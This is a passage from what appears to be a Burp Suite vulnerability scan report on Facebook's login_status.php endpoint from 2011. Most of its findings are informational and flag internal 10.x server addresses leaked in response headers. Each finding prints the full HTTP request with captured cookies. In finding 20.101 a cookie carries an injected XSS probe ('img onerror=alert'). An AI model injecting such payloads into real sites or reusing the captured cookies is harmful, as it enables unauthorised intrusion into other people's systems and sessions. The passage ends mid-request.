Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f266f11478&origin=http%3A%2F%2Faol.sportingnews.com%2Ffb79ca0e8&relation=parent&transport=postmessage&frame=f367d5ac9c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.174.36
X-Cnection: close
Date: Thu, 05 May 2011 01:55:50 GMT
Content-Length: 0


20.97. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.32.228.116

Request

GET /extern/login_status.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.228.116
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Content-Length: 22

Invalid Application ID

20.98. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.101.51

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df169355024%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff254aa4f9%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfaa30bf1c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff254aa4f9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b1d61008%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df8086eff8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff254aa4f9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b1d61008&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df10bb3483%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff254aa4f9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b1d61008&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df113b07bd8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff254aa4f9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b1d61008&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f10bb3483&origin=http%3A%2F%2Faol.sportingnews.com%2Ff254aa4f9&relation=parent&transport=postmessage&frame=f3b1d61008
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.101.51
X-Cnection: close
Date: Thu, 05 May 2011 01:05:31 GMT
Content-Length: 0


20.99. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.39.69

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfa0a79298%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff10a0fc7c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3e6f49c9c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff10a0fc7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d6467e74%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b445c58%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff10a0fc7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d6467e74&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df19894175c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff10a0fc7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d6467e74&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2ed1f779c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff10a0fc7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d6467e74&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f19894175c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff10a0fc7c&relation=parent&transport=postmessage&frame=f2d6467e74
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.39.69
X-Cnection: close
Date: Thu, 05 May 2011 01:39:11 GMT
Content-Length: 0


20.100. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.53.32.51

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df22176523%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2313123a4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2c87fdfec%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2313123a4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d45d8298%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2164ef4e8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2313123a4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d45d8298&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df37dcb8fb%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2313123a4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d45d8298&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df446c14b8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2313123a4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d45d8298&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f37dcb8fb&origin=http%3A%2F%2Faol.sportingnews.com%2Ff2313123a4&relation=parent&transport=postmessage&frame=f2d45d8298
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.53.32.51
X-Cnection: close
Date: Thu, 05 May 2011 01:44:43 GMT
Content-Length: 0


20.101. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.141.71

Request

GET /extern/login_status.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.141.71
Connection: close
Date: Thu, 05 May 2011 11:42:04 GMT
Content-Length: 22

Invalid Application ID

20.102. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.135.122

Request

GET /extern/login_status.php?api_key=113402378708388&app_id=113402378708388&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2a243865%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff399faa324%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df7852a4d4%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff399faa324%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1320f4c3%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1456244bc%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff399faa324%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1320f4c3&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df21051a9c%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff399faa324%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1320f4c3&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df8230fb08%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff399faa324%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1320f4c3&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f21051a9c&origin=http%3A%2F%2Ftechcrunch.com%2Ff399faa324&relation=parent&transport=postmessage&frame=f1320f4c3
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.135.122
X-Cnection: close
Date: Thu, 05 May 2011 02:00:46 GMT
Content-Length: 0


20.103. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.152.38

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df339f22bac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff29392a2b%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df76e3fff8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff29392a2b%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df9deabae%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfb839aafc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff29392a2b%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df9deabae&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3680e7058%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff29392a2b%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df9deabae&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfd4d57064%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff29392a2b%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df9deabae&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3680e7058&origin=http%3A%2F%2Faol.sportingnews.com%2Ff29392a2b&relation=parent&transport=postmessage&frame=f9deabae
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.152.38
X-Cnection: close
Date: Thu, 05 May 2011 01:57:02 GMT
Content-Length: 0


20.104. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.88.106

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df34e535694%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff30bbd6e9%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df360000aa%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff30bbd6e9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d721c85%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dff3fb7c84%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff30bbd6e9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d721c85&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df9a7f493c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff30bbd6e9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d721c85&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a67f5c94%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff30bbd6e9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d721c85&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f9a7f493c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff30bbd6e9&relation=parent&transport=postmessage&frame=f1d721c85
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.88.106
X-Cnection: close
Date: Thu, 05 May 2011 02:06:44 GMT
Content-Length: 0


20.105. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.174.38

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2634bbf1c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Fff62df8a%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df37a140984%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Fff62df8a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ebc88684%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3bfe620b8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Fff62df8a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ebc88684&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df39a559338%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Fff62df8a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ebc88684&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3a9ede818%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Fff62df8a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ebc88684&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f39a559338&origin=http%3A%2F%2Faol.sportingnews.com%2Fff62df8a&relation=parent&transport=postmessage&frame=f2ebc88684
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.174.38
X-Cnection: close
Date: Thu, 05 May 2011 01:32:10 GMT
Content-Length: 0


20.106. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.197.34

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df10429e7a%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff44208f0%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df31893e34%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff44208f0%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3772f9ad8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfc77bbbb4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff44208f0%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3772f9ad8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df344ae0c8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff44208f0%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3772f9ad8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df5b1346f8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff44208f0%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3772f9ad8&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f344ae0c8&origin=http%3A%2F%2Faol.sportingnews.com%2Ff44208f0&relation=parent&transport=postmessage&frame=f3772f9ad8
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.197.34
X-Cnection: close
Date: Thu, 05 May 2011 01:33:34 GMT
Content-Length: 0


20.107. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.209.64

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfcf0e28f4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b9dcf5ec%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df25b76338%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b9dcf5ec%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2be8e22c4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df7117ccd4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b9dcf5ec%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2be8e22c4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df32d8400c4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b9dcf5ec%26relation%3Dparent%2